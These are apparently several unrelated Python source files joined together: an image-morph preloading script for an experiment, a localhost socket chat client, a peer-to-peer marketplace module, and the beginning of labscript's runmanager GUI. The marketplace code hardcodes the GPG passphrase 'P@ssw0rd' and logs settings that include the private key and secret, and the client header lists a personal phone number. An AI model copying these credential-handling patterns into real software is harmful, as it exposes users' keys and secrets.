# currMorph=100-round(currImg/numberOfUpdates+1) if axis=='benchBed' else round(currImg/numberOfUpdates+1)
# # 检查morph的范围是在1-99之间
# if currMorph<1 or currMorph>99:
# raise Exception('morphing outside limit')
# curr_image=cfg.feedback_expScripts_dir+'carchair_exp_feedback/{}_{}_{}.png'.format(axis,currMorph,5)
# if curr_image!=last_image:
# currImage = cfg.feedback_expScripts_dir+'carchair_exp_feedback/{}_{}_{}.png'.format(axis,currMorph,5)
# tmp_images.append(currImage)
# last_image=cfg.feedback_expScripts_dir+'carchair_exp_feedback/{}_{}_{}.png'.format(axis,currMorph,5)
# # images=images+sample(tmp_images) # 将原本比较长的tmp_images选择其中的10个来作为新的短的tmp_images
# images=images+tmp_images
# tmp_images=[]
# for currImg in reversed(range(1,int(round(tune*currParameter*numberOfUpdates+1)),int((currParameter*numberOfUpdates+2)/numberOfUpdates))):
# currMorph=100-round(currImg/numberOfUpdates+1) if axis=='benchBed' else round(currImg/numberOfUpdates+1)
# curr_image=cfg.feedback_expScripts_dir+'carchair_exp_feedback/{}_{}_{}.png'.format(axis,currMorph,5)
# if curr_image!=last_image:
# currImage = cfg.feedback_expScripts_dir+'carchair_exp_feedback/{}_{}_{}.png'.format(axis,currMorph,5)
# tmp_images.append(currImage)
# last_image=cfg.feedback_expScripts_dir+'carchair_exp_feedback/{}_{}_{}.png'.format(axis,currMorph,5)
# # images=images+sample(tmp_images)
# images=images+tmp_images
# imageLists[currParameter]=images
# end = time.time()
# print("preload image duration=", end - start)
# return imageLists
# preload image list for parameter from 1 to 19.
def preloadimages(parameterRange=np.arange(1,20),tune=1):
'''
purpose:
preload images into image object sequences corrresponding too each parameter
each parameter corresponds to 40 image objects
steps:
'''
tune=tune-1
start = time.time()
imageLists={}
numberOfUpdates=16 # corresponds to 66 updates
last_image=''
for currParameter in tqdm(parameterRange): #49
images=[]
print('maximum morph=',round((tune*currParameter*numberOfUpdates+2)/numberOfUpdates+1))
for axis in ['bedTable', 'benchBed']:
tmp_images=[]
for currImg in range(1,int(round(tune*currParameter*numberOfUpdates+2)),int((currParameter*numberOfUpdates+2)/numberOfUpdates)):
currMorph=100-round(currImg/numberOfUpdates+1) if axis=='benchBed' else round(currImg/numberOfUpdates+1)
if currMorph<1 or currMorph>99:
raise Exception('morphing outside limit')
curr_image=cfg.feedback_expScripts_dir+'carchair_exp_feedback/{}_{}_{}.png'.format(axis,currMorph,5)
if curr_image!=last_image:
# currImage=visual.ImageStim(win=mywin,
# name='image',
# image=cfg.feedback_expScripts_dir+'carchair_exp_feedback/{}_{}_{}.png'.format(axis,currMorph,5), mask=None,
# ori=0, pos=(0, 0), size=(0.5, 0.5),
# color=[1,1,1], colorSpace='rgb', opacity=1,
# flipHoriz=False, flipVert=False,
# texRes=128, interpolate=True, depth=-4.0)
currImage = cfg.feedback_expScripts_dir+'carchair_exp_feedback/{}_{}_{}.png'.format(axis,currMorph,5)
tmp_images.append(currImage)
last_image=cfg.feedback_expScripts_dir+'carchair_exp_feedback/{}_{}_{}.png'.format(axis,currMorph,5)
images=images+sample(tmp_images)
tmp_images=[]
for currImg in reversed(range(1,int(round(tune*currParameter*numberOfUpdates+1)),int((currParameter*numberOfUpdates+2)/numberOfUpdates))):
currMorph=100-round(currImg/numberOfUpdates+1) if axis=='benchBed' else round(currImg/numberOfUpdates+1)
curr_image=cfg.feedback_expScripts_dir+'carchair_exp_feedback/{}_{}_{}.png'.format(axis,currMorph,5)
if curr_image!=last_image:
# currImage=visual.ImageStim(win=mywin,
# name='image',
# image=cfg.feedback_expScripts_dir+'carchair_exp_feedback/{}_{}_{}.png'.format(axis,currMorph,5), mask=None,
# ori=0, pos=(0, 0), size=(0.5, 0.5),
# color=[1,1,1], colorSpace='rgb', opacity=1,
# flipHoriz=False, flipVert=False,
# texRes=128, interpolate=True, depth=-4.0)
currImage = cfg.feedback_expScripts_dir+'carchair_exp_feedback/{}_{}_{}.png'.format(axis,currMorph,5)
tmp_images.append(currImage)
last_image=cfg.feedback_expScripts_dir+'carchair_exp_feedback/{}_{}_{}.png'.format(axis,currMorph,5)
images=images+sample(tmp_images)
imageLists.update( {currParameter : images} )
end = time.time()
print("preload image duration=", end - start)
return imageLists
_=time.time()
imageLists=preloadimages(parameterRange=np.arange(1,33),tune=tune)
print(f"len(imageLists)={len(imageLists)}")
print(f"len(imageLists[1])={len(imageLists[1])}") # 97 97 = 194
'''图片转化为视频'''
def pic2vid(imgList,save2=''):
import cv2
img_array = []
for filename in imgList:
img = cv2.imread(filename)
height, width, layers = img.shape
size = (width,height)
img_array.append(img)
fps = 20
out = cv2.VideoWriter(f'/Users/kailong/Downloads/{save2}.avi',cv2.VideoWriter_fourcc(*'DIVX'), fps, size)
for i in range(len(img_array)):
out.write(img_array[i])
out.release()
pic2vid(imageLists[32],save2="32")
"""如何理解图片顺序的设计"""
tune=4
parameterRange=np.arange(1,20)
tune=1
tune=tune-1 #当前tune=4
#当前tune=3
start = time.time()
imageLists={}
numberOfUpdates=16 # corresponds to 66 updates A - 15 + C1 + 15 + 1 + 15 + 1
# A 10 C 10 A 10 D 10 A
last_image=''
for currParameter in tqdm(parameterRange):
images=[]
print('maximum morph=',round((tune*currParameter*numberOfUpdates+2)/numberOfUpdates+1))
for axis in ['bedTable', 'benchBed']:
tmp_images=[]
for currImg in range(1, int(round(tune*currParameter*numberOfUpdates+2)), int((currParameter*numberOfUpdates+2)/numberOfUpdates)):
# 计算当前的morph程度
currMorph=100-round(currImg/numberOfUpdates+1) if axis=='benchBed' else round(currImg/numberOfUpdates+1)
# 避免morph不在1-99
if currMorph<1 or currMorph>99:
raise Exception('morphing outside limit')
# 该morph对应的图片的文件
currImage = cfg.feedback_expScripts_dir+'carchair_exp_feedback/{}_{}_{}.png'.format(axis,currMorph,5)
tmp_images.append(currImage)
images=images+sample(tmp_images)
tmp_images=[]
for currImg in reversed(range(1,int(round(tune*currParameter*numberOfUpdates+1)),int((currParameter*numberOfUpdates+2)/numberOfUpdates))):
currMorph=100-round(currImg/numberOfUpdates+1) if axis=='benchBed' else round(currImg/numberOfUpdates+1)
curr_image=cfg.feedback_expScripts_dir+'carchair_exp_feedback/{}_{}_{}.png'.format(axis,currMorph,5)
if curr_image!=last_image:
currImage = image=cfg.feedback_expScripts_dir+'carchair_exp_feedback/{}_{}_{}.png'.format(axis,currMorph,5)
tmp_images.append(currImage)
last_image=cfg.feedback_expScripts_dir+'carchair_exp_feedback/{}_{}_{}.png'.format(axis,currMorph,5)
images=images+sample(tmp_images)
imageLists.update( {currParameter : images} )
end = time.time()
print("preload image duration=", end - start)
|
client2.py
|
"""
network_client v1.0
done by:
Moe Assal
Contact:
mohammad.elassal04@gmail.com
phone number: +96171804948
location: Lebanon, Bekaa, Khirbet Rouha
v2.0:
reboot without exiting
"""
import socket
import threading
HOST = "127.0.0.1"
PORT = 5431
my_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def byte_to_string(bytes_):
bytes_ = str(bytes_)
return bytes_[2:len(bytes_) - 1] # converts from "b'string_passed'" to "string_passed"
def receive_and_print_data():
global received_data
while True:
try:
received_data = my_sock.recv(1024)
print(byte_to_string(received_data))
received_data = None
except ConnectionResetError:
print("you have been disconnected by an error in the server, we will fix the problem as soon as possible.")
print("please reboot")
return False
def send_data():
global input_data
while True:
try:
input_data = input()
my_sock.send(str.encode(input_data))
except ConnectionResetError:
return False
def initialize_client():
try:
my_sock.connect((HOST, PORT))
received_data_thread = threading.Thread(target=receive_and_print_data, args=())
send_data_thread = threading.Thread(target=send_data, args=())
send_data_thread.setDaemon(True)
received_data_thread.start()
send_data_thread.start()
return True
except ConnectionRefusedError:
print("server refused connection, we will fix the problem as soon as possible.")
print("please reboot")
return False
if __name__ == '__main__':
initialize_client()
|
market.py
|
"""
This module manages all market related activities
"""
from StringIO import StringIO
import ast
from base64 import b64decode, b64encode
import logging
import traceback
from PIL import Image, ImageOps
import gnupg
import tornado
from zmq.eventloop import ioloop
import constants
from pybitcointools.main import privkey_to_pubkey
from data_uri import DataURI
from orders import Orders
from protocol import proto_page, query_page
from threading import Thread
from crypto_util import makePrivCryptor
import random
import json
import hashlib
ioloop.install()
class Market(object):
def __init__(self, transport, db):
"""This class manages the active market for the application
Attributes:
transport (CryptoTransportLayer): Transport layer for messaging between nodes.
dht (DHT): For storage across the network.
market_id (int): Indicates which local market we're working with.
"""
# Current
self.transport = transport
self.dht = transport.get_dht()
self.market_id = transport.get_market_id()
# self._myself = transport.get_myself()
self.peers = self.dht.getActivePeers()
self.db = db
self.orders = Orders(transport, self.market_id, db)
self.pages = {}
self.mypage = None
self.signature = None
self.nickname = ""
self.log = logging.getLogger(
'[%s] %s' % (self.market_id, self.__class__.__name__)
)
self.settings = self.transport.settings
self.gpg = gnupg.GPG()
# Register callbacks for incoming events
self.transport.add_callbacks([
('query_myorders', self.on_query_myorders),
('peer', self.on_peer),
('query_page', self.on_query_page),
('query_listings', self.on_query_listings),
('negotiate_pubkey', self.on_negotiate_pubkey),
('proto_response_pubkey', self.on_response_pubkey)
])
self.load_page()
# Periodically refresh buckets
loop = tornado.ioloop.IOLoop.instance()
refreshCB = tornado.ioloop.PeriodicCallback(self.dht._refreshNode,
constants.refreshTimeout,
io_loop=loop)
refreshCB.start()
def load_page(self):
nickname = self.settings['nickname'] \
if 'nickname' in self.settings else ""
# store_description = self.settings['storeDescription'] if 'storeDescription' self.settings else ""
self.nickname = nickname
def disable_welcome_screen(self):
self.db.updateEntries(
"settings",
{'market_id': self.transport.market_id},
{"welcome": "disable"}
)
def private_key(self):
return self.settings['secret']
def on_listing_results(self, results):
self.log.debug('Listings %s' % results)
@staticmethod
def process_contract_image(image):
uri = DataURI(image)
imageData = uri.data
# mime_type = uri.mimetype
charset = uri.charset
image = Image.open(StringIO(imageData))
croppedImage = ImageOps.fit(image, (200, 200), centering=(0.5, 0.5))
data = StringIO()
croppedImage.save(data, format='PNG')
new_uri = DataURI.make(
'image/png',
charset=charset,
base64=True,
data=data.getvalue())
data.close()
return new_uri
@staticmethod
def get_contract_id():
return random.randint(0, 1000000)
@staticmethod
def linebreak_signing_data(data):
json_string = json.dumps(data, indent=0)
seg_len = 52
out_text = "\n".join(
json_string[x:x + seg_len]
for x in range(0, len(json_string), seg_len)
)
return out_text
@staticmethod
def generate_contract_key(signed_contract):
contract_hash = hashlib.sha1(str(signed_contract)).hexdigest()
hash_value = hashlib.new('ripemd160')
hash_value.update(contract_hash)
return hash_value.hexdigest()
def save_contract_to_db(self, contract_id, body, signed_body, key):
self.db.insertEntry(
"contracts",
{
"id": contract_id,
"market_id": self.transport.market_id,
"contract_body": json.dumps(body),
"signed_contract_body": str(signed_body),
"state": "seed",
"deleted": 0,
"key": key
}
)
def update_keywords_on_network(self, key, keywords):
for keyword in keywords:
keyword = keyword.upper()
hash_value = hashlib.new('ripemd160')
keyword_key = 'keyword-%s' % keyword
hash_value.update(keyword_key.encode('utf-8'))
keyword_key = hash_value.hexdigest()
self.log.debug('Sending keyword to network: %s' % keyword_key)
self.transport.dht.iterativeStore(
self.transport,
keyword_key,
json.dumps({
'keyword_index_add': {
"guid": self.transport.guid,
"key": key
}
}),
self.transport.guid
)
def save_contract(self, msg):
contract_id = self.get_contract_id()
# Refresh market settings
self.settings = self.get_settings()
msg['Seller']['seller_PGP'] = self.gpg.export_keys(self.settings['PGPPubkeyFingerprint'])
msg['Seller']['seller_BTC_uncompressed_pubkey'] = self.settings['btc_pubkey']
msg['Seller']['seller_GUID'] = self.settings['guid']
msg['Seller']['seller_Bitmessage'] = self.settings['bitmessage']
# Process and crop thumbs for images
if 'item_images' in msg['Contract']:
if 'image1' in msg['Contract']['item_images']:
img = msg['Contract']['item_images']['image1']
self.log.debug('Contract Image %s' % img)
new_uri = self.process_contract_image(img)
msg['Contract']['item_images'] = new_uri
else:
self.log.debug('No image for contract')
# Line break the signing data
out_text = self.linebreak_signing_data(msg)
# Sign the contract
signed_data = self.gpg.sign(out_text,
passphrase='P@ssw0rd',
keyid=self.settings.get('PGPPubkeyFingerprint'))
# Save contract to DHT
contract_key = self.generate_contract_key(signed_data)
# Store contract in database
self.save_contract_to_db(contract_id, msg, signed_data, contract_key)
# Store listing
t = Thread(target=self.transport.dht.iterativeStore, args=(self.transport,
contract_key,
str(signed_data),
self.transport.guid))
t.start()
t2 = Thread(target=self.update_listings_index)
t2.start()
# If keywords are present
keywords = msg['Contract']['item_keywords']
t3 = Thread(target=self.update_keywords_on_network, args=(contract_key, keywords,))
t3.start()
def shipping_address(self):
settings = self.get_settings()
shipping_address = {"recipient_name": settings.get('recipient_name'),
"street1": settings.get('street1'),
"street2": settings.get('street2'),
"city": settings.get('city'),
"stateRegion": settings.get('stateRegion'),
"stateProvinceRegion": settings.get('stateProvinceRegion'),
"zip": settings.get('zip'),
"country": settings.get('country'),
"countryCode": settings.get('countryCode')}
return shipping_address
def add_trusted_notary(self, guid, nickname=""):
self.log.debug('%s %s' % (guid, nickname))
notaries = self.settings.get('notaries')
self.log.debug('notaries: %s' % notaries)
if notaries == "" or notaries == []:
notaries = []
else:
notaries = json.loads(notaries)
for notary in notaries:
self.log.info(notary)
if notary.get('guid') == guid:
if notary.get('nickname') != nickname:
notary['nickname'] = nickname
notary['idx'] = notary
self.settings['notaries'] = notaries
return
notaries.append({"guid": guid, "nickname": nickname})
self.settings['notaries'] = json.dumps(notaries)
if 'btc_pubkey' in self.settings:
del self.settings['btc_pubkey']
self.db.updateEntries(
"settings",
{'market_id': self.transport.market_id},
self.settings
)
def _decode_list(self, data):
rv = []
for item in data:
if isinstance(item, unicode):
item = item.encode('utf-8')
elif isinstance(item, list):
item = self._decode_list(item)
elif isinstance(item, dict):
item = self._decode_dict(item)
rv.append(item)
return rv
def _decode_dict(self, data):
rv = {}
for key, value in data.iteritems():
if isinstance(key, unicode):
key = key.encode('utf-8')
if isinstance(value, unicode):
value = value.encode('utf-8')
elif isinstance(value, list):
value = self._decode_list(value)
elif isinstance(value, dict):
value = self._decode_dict(value)
rv[key] = value
return rv
def remove_trusted_notary(self, guid):
notaries = self.settings.get('notaries')
notaries = ast.literal_eval(notaries)
for idx, notary in enumerate(notaries):
if notary.get('guid') == guid:
del notaries[idx]
self.settings['notaries'] = json.dumps(notaries)
self.db.updateEntries(
"settings",
{'market_id': self.transport.market_id},
self.settings
)
def republish_contracts(self):
listings = self.db.selectEntries("contracts", {"deleted": 0})
for listing in listings:
self.transport.dht.iterativeStore(
self.transport,
listing['key'],
listing.get('signed_contract_body'),
self.transport.guid
)
# Push keyword index out again
contract = listing.get('Contract')
keywords = contract.get('item_keywords') if contract is not None else []
t3 = Thread(target=self.update_keywords_on_network, args=(listings.get('key'), keywords,))
t3.start()
self.update_listings_index()
def get_notaries(self, online_only=False):
self.log.debug('Getting notaries')
notaries = []
settings = self.get_settings()
# Untested code
if online_only:
notaries = {}
for n in settings['notaries']:
peer = self.dht.routingTable.getContact(n.guid)
if peer is not None:
t = Thread(target=peer.start_handshake)
t.start()
notaries.append(n)
return notaries
# End of untested code
return settings['notaries']
@staticmethod
def valid_guid(guid):
return len(guid) == 40 and int(guid, 16)
def republish_listing(self, msg):
listing_id = msg.get('productID')
listing = self.db.selectEntries("products", {"id": listing_id})
if listing:
listing = listing[0]
else:
return
listing_key = listing['key']
self.transport.dht.iterativeStore(
self.transport,
listing_key,
listing.get('signed_contract_body'),
self.transport.guid
)
self.update_listings_index()
# If keywords store them in the keyword index
# keywords = msg['Contract']['item_keywords']
# self.log.info('Keywords: %s' % keywords)
# for keyword in keywords:
#
# hash_value = hashlib.new('ripemd160')
# hash_value.update('keyword-%s' % keyword)
# keyword_key = hash_value.hexdigest()
#
# self.transport.dht.iterativeStore(self.transport, keyword_key, json.dumps({'keyword_index_add': contract_key}), self.transport.guid)
def update_listings_index(self):
# Store to marketplace listing index
contract_index_key = hashlib.sha1('contracts-%s' %
self.transport.guid).hexdigest()
hashvalue = hashlib.new('ripemd160')
hashvalue.update(contract_index_key)
contract_index_key = hashvalue.hexdigest()
# Calculate index of contracts
contract_ids = self.db.selectEntries(
"contracts",
{"market_id": self.transport.market_id, "deleted": 0}
)
my_contracts = []
for contract_id in contract_ids:
my_contracts.append(contract_id['key'])
self.log.debug('My Contracts: %s' % my_contracts)
# Sign listing index for validation and tamper resistance
data_string = str({'guid': self.transport.guid,
'contracts': my_contracts})
signature = makePrivCryptor(self.transport.settings['secret']).sign(data_string).encode('hex')
value = {'signature': signature,
'data': {'guid': self.transport.guid,
'contracts': my_contracts}}
# Pass off to thread to keep GUI snappy
t = Thread(target=self.transport.dht.iterativeStore, args=(self.transport,
contract_index_key,
value,
self.transport.guid,))
t.start()
def remove_contract(self, msg):
self.log.info("Removing contract: %s" % msg)
# Remove from DHT keyword indices
self.remove_from_keyword_indexes(msg['contract_id'])
self.db.updateEntries("contracts", {"id": msg["contract_id"]}, {"deleted": 1})
self.update_listings_index()
def remove_from_keyword_indexes(self, contract_id):
contract = self.db.selectEntries("contracts", {"id": contract_id})[0]
contract_key = contract['key']
contract = json.loads(contract['contract_body'])
contract_keywords = contract['Contract']['item_keywords']
for keyword in contract_keywords:
# Remove keyword from index
hash_value = hashlib.new('ripemd160')
keyword_key = 'keyword-%s' % keyword
hash_value.update(keyword_key.encode('utf-8'))
keyword_key = hash_value.hexdigest()
self.transport.dht.iterativeStore(
self.transport,
keyword_key,
json.dumps({
'keyword_index_remove': {
"guid": self.transport.guid,
"key": contract_key
}
}),
self.transport.guid
)
def get_messages(self):
self.log.info("Listing messages for market: %s" % self.transport.market_id)
settings = self.get_settings()
try:
# Request all messages for our address
inboxmsgs = json.loads(self.transport.bitmessage_api.getInboxMessagesByReceiver(
settings['bitmessage']))
for m in inboxmsgs['inboxMessages']:
# Base64 decode subject and content
m['subject'] = b64decode(m['subject'])
m['message'] = b64decode(m['message'])
# TODO: Augment with market, if available
return {"messages": inboxmsgs}
except Exception as e:
self.log.error("Failed to get inbox messages: {}".format(e))
self.log.error(traceback.format_exc())
return {}
def send_message(self, msg):
self.log.info("Sending message for market: %s" % self.transport.market_id)
settings = self.get_settings()
try:
# Base64 decode subject and content
self.log.info("Encoding message: {}".format(msg))
subject = b64encode(msg['subject'])
body = b64encode(msg['body'])
result = self.transport.bitmessage_api.sendMessage(
msg['to'], settings['bitmessage'], subject, body
)
self.log.info("Send message result: {}".format(result))
return {}
except Exception as e:
self.log.error("Failed to send message: %s" % e)
self.log.error(traceback.format_exc())
return {}
def get_contracts(self, page=0):
self.log.info('Getting contracts for market: %s' % self.transport.market_id)
contracts = self.db.selectEntries(
"contracts",
{"market_id": self.transport.market_id, "deleted": 0},
limit=10,
limit_offset=(page * 10)
)
my_contracts = []
for contract in contracts:
try:
contract_body = json.loads(u"%s" % contract['contract_body'])
item_price = contract_body.get('Contract').get('item_price') if contract_body.get('Contract').get('item_price') > 0 else 0
shipping_price = contract_body.get('Contract').get('item_delivery').get('shipping_price') if contract_body.get('Contract').get('item_delivery').get('shipping_price') > 0 else 0
my_contracts.append({"key": contract['key'] if 'key' in contract else "",
"id": contract['id'] if 'id' in contract else "",
"item_images": contract_body.get('Contract').get('item_images'),
"signed_contract_body": contract['signed_contract_body'] if 'signed_contract_body' in contract else "",
"contract_body": contract_body,
"unit_price": item_price,
"deleted": contract.get('deleted'),
"shipping_price": shipping_price,
"item_title": contract_body.get('Contract').get('item_title'),
"item_desc": contract_body.get('Contract').get('item_desc'),
"item_condition": contract_body.get('Contract').get('item_condition'),
"item_quantity_available": contract_body.get('Contract').get('item_quantity')})
except:
self.log.error('Problem loading the contract body JSON')
return {"contracts": my_contracts, "page": page,
"total_contracts": len(self.db.selectEntries("contracts", {"deleted": "0"}))}
def undo_remove_contract(self, contract_id):
self.log.info('Undo remove contract: %s' % contract_id)
self.db.updateEntries("contracts",
{"market_id": self.transport.market_id.replace("'", "''"), "id": contract_id},
{"deleted": "0"})
# SETTINGS
def save_settings(self, msg):
self.log.debug("Settings to save %s" % msg)
# Check for any updates to arbiter or notary status to push to the DHT
if 'notary' in msg:
# Generate notary index key
hash_value = hashlib.new('ripemd160')
hash_value.update('notary-index')
key = hash_value.hexdigest()
if msg['notary'] is True:
self.log.info('Letting the network know you are now a notary')
data = json.dumps({'notary_index_add': self.transport.guid})
self.transport.dht.iterativeStore(self.transport, key, data, self.transport.guid)
else:
self.log.info('Letting the network know you are not a notary')
data = json.dumps({'notary_index_remove': self.transport.guid})
self.transport.dht.iterativeStore(self.transport, key, data, self.transport.guid)
# Update nickname
self.transport.nickname = msg['nickname']
if 'burnAmount' in msg:
del msg['burnAmount']
if 'burnAddr' in msg:
del msg['burnAddr']
# Update local settings
self.db.updateEntries("settings", {'market_id': self.transport.market_id}, msg)
def get_settings(self):
self.log.info('Getting settings info for Market %s' % self.transport.market_id)
settings = self.db.getOrCreate("settings", {"market_id": self.transport.market_id})
if settings['arbiter'] == 1:
settings['arbiter'] = True
if settings['notary'] == 1:
settings['notary'] = True
settings['notaries'] = ast.literal_eval(settings['notaries']) if settings['notaries'] != "" else []
settings['trustedArbiters'] = ast.literal_eval(settings['trustedArbiters']) if settings['trustedArbiters'] != "" else []
settings['privkey'] = settings['privkey'] if 'secret' in settings else ""
settings['btc_pubkey'] = privkey_to_pubkey(settings.get('privkey'))
settings['secret'] = settings['secret'] if 'secret' in settings else ""
self.log.info('SETTINGS: %s' % settings)
if settings:
return settings
else:
return {}
# PAGE QUERYING
def query_page(self, find_guid, callback=lambda msg: None):
self.log.info('Searching network for node: %s' % find_guid)
msg = query_page(find_guid)
msg['uri'] = self.transport.uri
msg['senderGUID'] = self.transport.guid
msg['sin'] = self.transport.sin
msg['pubkey'] = self.transport.pubkey
self.transport.send(msg, find_guid, callback)
# Return your page info if someone requests it on the network
def on_query_page(self, peer):
self.log.info("Someone is querying for your page")
settings = self.get_settings()
new_peer = self.transport.get_crypto_peer(
peer['senderGUID'],
peer['uri'],
pubkey=peer['pubkey'],
nickname=peer['senderNick']
)
def send_page_query():
t = Thread(target=new_peer.start_handshake)
t.start()
new_peer.send(proto_page(self.transport.uri,
self.transport.pubkey,
self.transport.guid,
settings['storeDescription'],
self.signature,
settings['nickname'],
settings['PGPPubKey'] if 'PGPPubKey' in settings else '',
settings['email'] if 'email' in settings else '',
settings['bitmessage'] if 'bitmessage' in settings else '',
settings['arbiter'] if 'arbiter' in settings else '',
settings['notary'] if 'notary' in settings else '',
settings['arbiterDescription'] if 'arbiterDescription' in settings else '',
self.transport.sin))
t = Thread(target=send_page_query)
t.start()
def on_query_myorders(self, peer):
self.log.info("Someone is querying for your page: %s" % peer)
def on_query_listings(self, peer, page=0):
self.log.info("Someone is querying your listings: %s" % peer)
contracts = self.get_contracts(page)
if len(contracts['contracts']) == 0:
self.transport.send({"type": "no_listing_result"}, peer['senderGUID'])
return
else:
for contract in contracts['contracts']:
contract = contract
contract['type'] = "listing_result"
self.transport.send(contract, peer['senderGUID'])
def on_peer(self, peer):
pass
def on_negotiate_pubkey(self, ident_pubkey):
self.log.info("Someone is asking for your real pubKey")
assert "nickname" in ident_pubkey
assert "ident_pubkey" in ident_pubkey
nickname = ident_pubkey['nickname']
ident_pubkey = ident_pubkey['ident_pubkey'].decode("hex")
self.transport.respond_pubkey_if_mine(nickname, ident_pubkey)
def on_response_pubkey(self, response):
assert "pubkey" in response
assert "nickname" in response
assert "signature" in response
pubkey = response["pubkey"].decode("hex")
# signature = response["signature"].decode("hex")
nickname = response["nickname"]
# Cache mapping for later.
if nickname not in self.transport.nick_mapping:
self.transport.nick_mapping[nickname] = [None, pubkey]
# Verify signature here...
# Add to our dict.
self.transport.nick_mapping[nickname][1] = pubkey
self.log.info("[market] mappings: ###############")
for key, value in self.transport.nick_mapping.iteritems():
self.log.info("'%s' -> '%s' (%s)" % (
key, value[1].encode("hex") if value[1] is not None else value[1],
value[0].encode("hex") if value[0] is not None else value[0]))
self.log.info("##################################")
def release_funds_to_merchant(self, buyer_order_id, tx, script, signatures, guid):
self.log.debug('Release funds to merchant: %s %s %s %s' % (buyer_order_id, tx, signatures, guid))
self.transport.send(
{
'type': 'release_funds_tx',
'tx': tx,
'script': script,
'buyer_order_id': buyer_order_id,
'signatures': signatures
},
guid
)
self.log.debug('TX sent to merchant')
|
__main__.py
|
#####################################################################
# #
# __main__.py #
# #
# Copyright 2013, Monash University #
# #
# This file is part of the program runmanager, in the labscript #
# suite (see http://labscriptsuite.org), and is licensed under the #
# Simplified BSD License. See the license.txt file in the root of #
# the project for the full license. #
# #
#####################################################################
from __future__ import division, unicode_literals, print_function, absolute_import
from labscript_utils import PY2
if PY2:
str = unicode
import Queue as queue
else:
import queue
import os
import sys
import labscript_utils.excepthook
try:
from labscript_utils import check_version
except ImportError:
raise ImportError('Require labscript_utils > 2.1.0')
check_version('labscript_utils', '2.10.0', '3')
# Splash screen
from labscript_utils.splash import Splash
splash = Splash(os.path.join(os.path.dirname(__file__), 'runmanager.svg'))
splash.show()
splash.update_text('importing standard library modules')
import time
import contextlib
import subprocess
import threading
import ast
import pprint
import traceback
splash.update_text('importing matplotlib')
# Evaluation of globals happens in a thread with the pylab module imported.
# Although we don't care about plotting, importing pylab makes Qt calls. We
# can't have that from a non main thread, so we'll just disable matplotlib's
# GUI integration:
import matplotlib
matplotlib.use('Agg')
import signal
# Quit on ctrl-c
signal.signal(signal.SIGINT, signal.SIG_DFL)
splash.update_text('importing Qt')
check_version('qtutils', '2.2.2', '3.0.0')
splash.update_text('importing pandas')
check_version('pandas', '0.13', '2')
from qtutils.qt import QtCore, QtGui, QtWidgets
from qtutils.qt.QtCore import pyqtSignal as Signal
splash.update_text('importing labscript suite modules')
check_version('labscript_utils', '2.11.0', '3')
from labscript_utils.ls_zprocess import zmq_get, ProcessTree, ZMQServer
from labscript_utils.labconfig import LabConfig
from labscript_utils.setup_logging import setup_logging
import labscript_utils.shared_drive as shared_drive
from labscript_utils import dedent
from zprocess import raise_exception_in_thread
import runmanager
import runmanager.remote
from qtutils import (
inmain,
inmain_decorator,
UiLoader,
inthread,
DisconnectContextManager,
qtlock,
)
from labscript_utils.qtwidgets.outputbox import OutputBox
import qtutils.icons
GLOBAL_MONOSPACE_FONT = "Consolas" if os.name == 'nt' else "Ubuntu Mono"
# Set working directory to runmanager folder, resolving symlinks
runmanager_dir = os.path.dirname(os.path.realpath(__file__))
os.chdir(runmanager_dir)
process_tree = ProcessTree.instance()
# Set a meaningful name for zprocess.locking's client id:
process_tree.zlock_client.set_process_name('runmanager')
def log_if_global(g, g_list, message):
"""logs a message if the global name "g" is in "g_list"
useful if you want to print out a message inside a loop over globals,
but only for a particular global (or set of globals).
If g_list is empty, then it will use the hardcoded list below
(useful if you want to change the behaviour globally)
"""
if not isinstance(g_list, list):
g_list = [g_list]
if not g_list:
g_list = [] # add global options here
if g in g_list:
logger.info(message)
def composite_colors(r0, g0, b0, a0, r1, g1, b1, a1):
"""composite a second colour over a first with given alpha values and return the
result"""
a0 /= 255
a1 /= 255
a = a0 + a1 - a0 * a1
r = (a1 * r1 + (1 - a1) * a0 * r0) / a
g = (a1 * g1 + (1 - a1) * a0 * g0) / a
b = (a1 * b1 + (1 - a1) * a0 * b0) / a
return [int(round(x)) for x in (r, g, b, 255 * a)]
def set_win_appusermodel(window_id):
from labscript_utils.winshell import set_appusermodel, appids, app_descriptions
icon_path = os.path.abspath('runmanager.ico')
executable = sys.executable.lower()
if not executable.endswith('w.exe'):
executable = executable.replace('.exe', 'w.exe')
relaunch_command = executable + ' ' + os.path.abspath(__file__.replace('.pyc', '.py'))
relaunch_display_name = app_descriptions['runmanager']
set_appusermodel(window_id, appids['runmanager'], icon_path, relaunch_command, relaunch_display_name)
@inmain_decorator()
def error_dialog(message):
QtWidgets.QMessageBox.warning(app.ui, 'runmanager', message)
@inmain_decorator()
def question_dialog(message):
reply = QtWidgets.QMessageBox.question(app.ui, 'runmanager', message,
QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No)
return (reply == QtWidgets.QMessageBox.Yes)
@contextlib.contextmanager
def nested(*contextmanagers):
if contextmanagers:
with contextmanagers[0]:
with nested(*contextmanagers[1:]):
yield
else:
yield
def scroll_view_to_row_if_current(view, item):
"""Checks to see if the item is in the row of the current item. If it is, scrolls
the treeview/tableview vertically to ensure that row is visible. This is done by
recording the horizontal scroll position, then using view.scrollTo(), and then
restoring the horizontal position"""
horizontal_scrollbar = view.horizontalScrollBar()
existing_horizontal_position = horizontal_scrollbar.value()
index = item.index()
current_row = view.currentIndex().row()
if index.row() == current_row:
view.scrollTo(index)
horizontal_scrollbar.setValue(existing_horizontal_position)
class FingerTabBarWidget(QtWidgets.QTabBar):
"""A TabBar with the tabs on the left and the text horizontal. Credit to
@LegoStormtroopr, https://gist.github.com/LegoStormtroopr/5075267. We will
promote the TabBar from the ui file to one of these."""
def __init__(self, parent=None, minwidth=180, minheight=30, **kwargs):
QtWidgets.QTabBar.__init__(self, parent, **kwargs)
self.minwidth = minwidth
self.minheight = minheight
self.iconPosition = kwargs.pop('iconPosition', QtWidgets.QTabWidget.West)
self._movable = None
self.tab_movable = {}
self.paint_clip = None
def setMovable(self, movable, index=None):
"""Set tabs movable on an individual basis, or set for all tabs if no
index specified"""
if index is None:
self._movable = movable
self.tab_movable = {}
QtWidgets.QTabBar.setMovable(self, movable)
else:
self.tab_movable[int(index)] = bool(movable)
def isMovable(self, index=None):
if index is None:
if self._movable is None:
self._movable = QtWidgets.QTabBar.isMovable(self)
return self._movable
return self.tab_movable.get(index, self._movable)
def indexAtPos(self, point):
for index in range(self.count()):
if self.tabRect(index).contains(point):
return index
def mousePressEvent(self, event):
index = self.indexAtPos(event.pos())
